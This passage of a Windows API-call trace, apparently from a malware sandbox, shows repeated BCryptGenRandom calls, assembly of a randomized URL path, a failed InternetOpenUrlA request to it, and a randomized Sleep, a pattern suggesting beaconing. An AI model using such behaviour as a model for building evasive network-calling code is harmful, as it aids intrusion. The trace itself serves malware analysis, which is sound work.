cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4951, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4d4951) returned 0x0 [0190.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4974, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x4d4974) returned 0x0 [0190.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0190.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.419] GetProcessHeap () returned 0x440000 [0190.419] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0190.419] lstrcpyA (in: lpString1=0x472900, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0190.419] lstrcatA (in: lpString1="\x81\x03", lpString2="/ee2jqaj5UYyh60Jjkq6qhWi9t1E0vtbz6ois/04nyeb40b3lw3m1LU8zqoLpvdLs47dz3xab5ceYf9m/texDHk6WUcnfs6Tgmwphun1fy1oJr81ciU/tffcsSte6ofEFx19/" | out: lpString1="\x81\x03/ee2jqaj5UYyh60Jjkq6qhWi9t1E0vtbz6ois/04nyeb40b3lw3m1LU8zqoLpvdLs47dz3xab5ceYf9m/texDHk6WUcnfs6Tgmwphun1fy1oJr81ciU/tffcsSte6ofEFx19/") returned="\x81\x03/ee2jqaj5UYyh60Jjkq6qhWi9t1E0vtbz6ois/04nyeb40b3lw3m1LU8zqoLpvdLs47dz3xab5ceYf9m/texDHk6WUcnfs6Tgmwphun1fy1oJr81ciU/tffcsSte6ofEFx19/" [0190.419] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0190.419] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/ee2jqaj5UYyh60Jjkq6qhWi9t1E0vtbz6ois/04nyeb40b3lw3m1LU8zqoLpvdLs47dz3xab5ceYf9m/texDHk6WUcnfs6Tgmwphun1fy1oJr81ciU/tffcsSte6ofEFx19/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0190.419] GetProcessHeap () returned 0x440000 [0190.419] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0190.419] GetProcessHeap () returned 0x440000 [0190.419] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4900 | out: hHeap=0x440000) returned 1 [0190.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0190.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0190.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0190.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0190.420] Sleep (dwMilliseconds=0x17c5a) [0190.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0190.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.603] GetProcessHeap () returned 0x440000 [0190.603] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b720 [0190.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b721, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a1b721) returned 0x0 [0190.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b733, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a1b733) returned 0x0 [0190.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.610] 